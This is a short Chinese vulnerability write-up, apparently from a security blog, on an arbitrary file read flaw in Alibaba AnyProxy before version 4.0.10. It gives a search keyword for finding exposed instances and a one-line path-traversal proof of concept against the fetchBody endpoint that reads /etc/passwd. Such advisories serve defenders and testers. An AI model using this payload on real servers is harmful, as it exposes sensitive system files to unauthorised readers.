Alibaba AnyProxy fetchBody 任意文件读取漏洞

漏洞描述

Alibaba AnyProxy 低版本存在任意文件读取,通过漏洞,攻击者可以获取服务器敏感信息。

漏洞影响

Alibaba AnyProxy < 4.0.10

网络测绘

“anyproxy”

漏洞复现

页面如下

20240514102508449-image-20210718204835288.4da1bc43_2024-05-14_10-25-00 (1)

验证POC为

/fetchBody?id=1/../../../../../../../../etc/passwd

20240514102543174-image-20210718204843037.5f60afaa_2024-05-14_10-25-37 (1)

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容